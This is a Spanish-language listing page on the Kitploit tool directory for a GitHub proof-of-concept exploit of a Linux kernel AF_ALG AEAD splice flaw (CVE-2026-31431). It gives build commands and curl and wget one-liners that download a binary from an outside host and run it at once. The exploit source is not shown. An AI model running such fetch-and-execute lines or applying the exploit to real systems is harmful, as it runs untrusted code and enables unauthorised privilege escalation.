Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-31431 — Puerto C de una prueba de concepto que explota una falla en la lógica de splice de AEAD AF_ALG del kernel de Linux (CVE-2026-31431) para investigación educativa. | Kitploit
Herramientas/GitHubGitHub/offsecguy/cve-2026-31431
Análisis de VulnerabilidadesExplotaciónExplotación de Binarios
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

Puerto C de una prueba de concepto que explota una falla en la lógica de splice de AEAD AF_ALG del kernel de Linux (CVE-2026-31431) para investigación educativa.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

copy.fail — Primitiva splice AEAD AF_ALG (CVE-2026-31431)

Resumen

Este proyecto es un port a C del prototipo original en Python, realizado por offsecguy.
Aprovecha la API criptográfica del kernel de Linux (AF_ALG) utilizando:

  • Modo AEAD authencesn(hmac(sha256),cbc(aes))
  • La bandera MSG_MORE
  • La llamada al sistema splice()

La técnica alimenta datos desde un descriptor de archivo de solo lectura a través de un socket criptográfico, procesándolos por fragmentos.


⚙️ Compilación

Opción 1 — musl (Compilación estática)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

Opción 2 — GCC estático

root@kitploit:~
gcc exp.c -o exp -lz -s -static

Opción 3 — GCC dinámico

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 Ejecución remota

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ Notas

  • Requiere soporte del kernel de Linux para AF_ALG
  • Utiliza zlib para la descompresión
  • Diseñado para la interacción y experimentación con la criptografía de bajo nivel del kernel

Aviso legal

Este código se proporciona únicamente con fines educativos y de investigación.
Úsalo de forma responsable y solo en sistemas que estés autorizado a probar.

Descargar herramienta